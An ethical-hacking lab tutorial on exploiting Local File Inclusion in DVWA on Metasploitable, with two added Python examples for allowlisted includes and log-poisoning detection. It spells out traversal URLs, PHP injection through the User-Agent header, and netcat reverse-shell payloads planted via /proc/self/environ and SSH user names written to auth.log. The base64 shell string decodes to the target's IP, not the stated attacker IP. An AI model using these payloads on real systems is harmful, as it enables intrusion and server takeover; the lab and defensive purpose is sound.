Local File Inclusion(LFI) Vulnerability & Remote Files Access From Server Using LFI


LFI Vulnerability




Payloads to get access using remote code

● /proc/self/environ

● /var/log/auth.log

● /var/log/apache2/access.log


LFI Vulnerability Live Process: using /etc/passwd & /proc/self/environ payloads


> Open the Metasploitable machine > ifconfig > note the IP

> In the Kali browser > enter the IP > click DVWA

> DVWA user: admin & password: password

> DVWA > Security: Low

> go to File Inclusion & get the link

● Link : https://192.168.37.129/dvwa/vulnerabilities/fi/?page=include.php

● Try to see the directory: https://192.168.37.129/dvwa/vulnerabilities/fi/include.php



LFI vulnerability Check using payload:


We will check whether an LFI vulnerability exists on this server by sending a payload (malicious input) and seeing how the page responds.

payload or malicious code: /etc/passwd

● Sending the payload to reach the root directory (in the browser): https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd

>> This vulnerability will work on DVWA low and medium security*
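To see from the defender's side why this payload works and what a safe include looks like, here is an added Python model; it is not DVWA's or the author's code. The web root path is assumed from the page's URLs, and the allowlist holds only include.php, the one page name this article uses.

```python
"""Added example (not DVWA's or the author's code): why `?page=` is exploitable
and how a hardened include would reject the page's payloads.

Assumptions: the web root below is inferred from the page's URLs; the
allowlist holds only include.php, the one page name this article uses.
"""
import posixpath

WEB_ROOT = "/var/www/dvwa/vulnerabilities/fi"   # assumed from the page's URLs
ALLOWED_PAGES = {"include.php"}                  # assumed allowlist


class IncludeRejected(Exception):
    """Raised when a requested page must not be included."""


def vulnerable_include_path(page: str) -> str:
    """The DVWA-low pattern: include($_GET['page']) with no checks at all.
    Whatever the client sends is the path PHP will open."""
    return page


def resolve_target(page: str, web_root: str = WEB_ROOT) -> str:
    """Normalize `page` the way the filesystem will see it.
    An absolute value discards the web root (posixpath.join does that), and
    normpath collapses each '../', so '/../../../../../etc/passwd' becomes
    '/etc/passwd'. This is exactly why the page's payload works."""
    return posixpath.normpath(posixpath.join(web_root, page))


def is_traversal_attempt(page: str, web_root: str = WEB_ROOT) -> bool:
    """True when the resolved path lies outside the web root."""
    target = resolve_target(page, web_root)
    return posixpath.commonpath([web_root, target]) != web_root


def hardened_include_path(page: str, web_root: str = WEB_ROOT) -> str:
    """Allowlist first, containment check second (defence in depth)."""
    if page not in ALLOWED_PAGES:
        raise IncludeRejected(f"page not on allowlist: {page!r}")
    target = resolve_target(page, web_root)
    if posixpath.commonpath([web_root, target]) != web_root:
        raise IncludeRejected(f"path escapes web root: {target}")
    return target


if __name__ == "__main__":
    for p in ("include.php", "/../../../../../etc/passwd",
              "/../../../../../proc/self/environ", "/../../../../../var/log/auth.log"):
        print(f"{p!r:45} -> {resolve_target(p):22} traversal={is_traversal_attempt(p)}")
        try:
            print("   hardened include:", hardened_include_path(p))
        except IncludeRejected as e:
            print("   hardened include rejected:", e)
```

Run it and the last three payload values resolve to /etc/passwd, /proc/self/environ and /var/log/auth.log, which is the whole vulnerability: the web root contributes nothing once the client supplies an absolute or '../' path. The allowlist check is what actually fixes it; the containment check stays as a second line of defence in case the allowlist is ever relaxed to a pattern.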



Payloads to get access using remote code


● /proc/self/environ

● /var/log/auth.log

● /var/log/apache2/access.log

Replace /etc/passwd with /proc/self/environ

----------

● https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ



Remote Code Execution (PHP Code)

Now, using Burp Suite, we will execute remote code.

> In Kali > search for Burp > open it

> set up the proxy in Firefox > Firefox > Settings > search for "proxy" > choose manual proxy & enter IP 127.0.0.1 & port 8080

● now go to Burp > Proxy > Intercept on & visit the link from Firefox: https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ

> now you capture the request in Burp



> In Burp click Inspector (on the right) > Request headers > User-Agent > click the arrow

> now we will add PHP code to check whether it gets executed

> add this code: <? phpinfo(); ?>



> apply changes > forward the request

> in the browser you will see DVWA showing its PHP information

> so remote code can be executed



Using Netcat we will now take server access

Netcat (nc) is a utility that reads from and writes to network connections over TCP or UDP. During an attack it helps us debug and investigate the network. It runs on all operating systems, and in Kali it is installed by default.

First, we have to create a listener with the following command. The port can be anything, e.g. 8080 or 8888.

● in Kali: nc -h (to see all options)

● nc -l -vv -p 8888

where,

[-l]: listen mode

[-vv]: verbose mode {one -v is enough, but we use it twice to be more verbose and learn more about the connecting machine}

[-p]: local port



Add reverse shell to burp

● in Burp > Intercept on again > capture the request to https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ

● Inspector > User-Agent > put in the reverse shell code: <?passthru("nc -e /bin/sh 192.168.37.128 8888");?>

(NB: 192.168.37.128 is my Kali IP)



● now in Kali > NC gets the connection

> pwd (to see the current directory)

> ls (to list all files)

> cd /var/www/dvwa/

> Now you can go to the root directory and tamper with any file



LFI Vulnerability Live Process: using another payload (/var/log/auth.log) and get access using SSH Port


● DVWA : Security : Medium

● Instead of https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd we will use https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../var/log/auth.log



create a listener with Netcat:

> First, we have to create a listener with the following command. The port can be anything, e.g. 8080 or 8888.

● nc -l -vv -p 8888

In another Kali terminal we will run the SSH command


> General command to access through the SSH port:

● ssh -oHostKeyAlgorithms=+ssh-rsa "<?passthru('nc -e /bin/sh 192.168.37.128 8888');?>"@192.168.37.129

NB: this is an SSH login attempt whose user name is the passthru/reverse-shell payload, in the form payload@domain-or-IP; sshd records the rejected user name in /var/log/auth.log, which is the file the LFI then includes.

NB: 192.168.37.128 is my kali IP *

NB: 192.168.37.129 is my Metasploitable machine IP *

● encode nc -e /bin/sh 192.168.37.128 8888 using Burp (open Burp > Decoder > Encode as base64 > copy the encoded string)

> after encoding, the SSH command becomes

● ssh -oHostKeyAlgorithms=+ssh-rsa "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjM3LjEyOSA4ODg4'));?>"@192.168.37.129



> In Firefox reload https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../var/log/auth.log

> now look at the Netcat listening window & you get the connection

> pwd (to see the current directory)

> ls (to list all files)

> cd /var/www/dvwa/

> Now you can go to the root directory and tamper with any file
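Both walkthroughs on this page depend on the attacker's input landing in a file the LFI can include: the User-Agent reaches /proc/self/environ and Apache's access.log, and the SSH user name reaches auth.log. The following added Python example (not the author's or DVWA's code) shows the detection rules a defender would run over both logs. The log lines are constructed for this example, reusing the page's Kali and Metasploitable addresses; it assumes the Apache combined log format and the standard sshd "Invalid user" message.

```python
"""Added example (not the author's or DVWA's code): detection rules for the two
log-poisoning paths this article walks through, run over constructed sample
log lines.

Assumptions: Apache combined log format for access.log; the Debian/Ubuntu
sshd "Invalid user X from IP" line for auth.log; timestamps and PIDs below
are constructed for the example.
"""
import re
from dataclasses import dataclass
from typing import List

# A PHP open tag anywhere in attacker-controlled text is the poisoning marker.
PHP_TAG = re.compile(r"<\?(?:php|=)?", re.IGNORECASE)
# Directory traversal, plain or URL-encoded, plus the sensitive targets named on the page.
TRAVERSAL = re.compile(r"(?:\.\./|\.\.%2f|%2e%2e/|%2e%2e%2f)", re.IGNORECASE)
SENSITIVE = re.compile(r"/(?:etc/passwd|proc/self/environ|var/log/)", re.IGNORECASE)

# Combined log format; quoted fields may contain backslash-escaped quotes.
QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>' + QUOTED + r')" "(?P<ua>' + QUOTED + r')"'
)
SSHD_INVALID = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>.+?) from (?P<ip>\S+)")


@dataclass
class Finding:
    source: str
    rule: str
    client: str
    evidence: str


def scan_access_line(line: str) -> List[Finding]:
    """Flag LFI probes in the URI and PHP tags in User-Agent/Referer.
    The User-Agent is what /proc/self/environ exposes and what Apache writes
    to access.log, so a PHP tag there is a poisoning attempt."""
    m = COMBINED.match(line)
    if not m:
        return []
    out = []
    if TRAVERSAL.search(m["uri"]) or SENSITIVE.search(m["uri"]):
        out.append(Finding("access.log", "lfi_traversal", m["ip"], m["uri"]))
    for field in ("ua", "ref"):
        if PHP_TAG.search(m[field]):
            out.append(Finding("access.log", "log_poisoning_php_tag", m["ip"], m[field]))
            break
    return out


def scan_auth_line(line: str) -> List[Finding]:
    """sshd records the attempted user name verbatim; a PHP tag in it means
    someone is writing code into auth.log for a later include."""
    m = SSHD_INVALID.search(line)
    if m and PHP_TAG.search(m["user"]):
        return [Finding("auth.log", "log_poisoning_php_tag", m["ip"], m["user"])]
    return []


# Constructed sample lines mirroring the article's requests (not real captures).
SAMPLE_ACCESS = [
    '192.168.37.128 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '192.168.37.128 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd HTTP/1.1" 200 2104 "-" "Mozilla/5.0"',
    '192.168.37.128 - - [01/Jan/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ HTTP/1.1" 200 3911 "-" "<? phpinfo(); ?>"',
]
SAMPLE_AUTH = [
    "Jan  1 10:01:00 metasploitable sshd[2231]: Invalid user <? phpinfo(); ?> from 192.168.37.128",
    "Jan  1 10:01:30 metasploitable sshd[2240]: Accepted password for msfadmin from 192.168.37.128 port 51234 ssh2",
]


def scan_all(access=SAMPLE_ACCESS, auth=SAMPLE_AUTH) -> List[Finding]:
    findings = []
    for line in access:
        findings.extend(scan_access_line(line))
    for line in auth:
        findings.extend(scan_auth_line(line))
    return findings


if __name__ == "__main__":
    for f in scan_all():
        print(f"[{f.source}] {f.rule:24} client={f.client} evidence={f.evidence}")
```

The traversal rule alone would already have flagged the first request in this article, before any code was written into a log; the PHP-tag rule catches the poisoning step itself. Neither replaces the fix, which is not passing client input to include(), but together they tell you when someone is probing for it.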


Read more blogs on ethical hacking here.


Thanks

Minhazul Asif
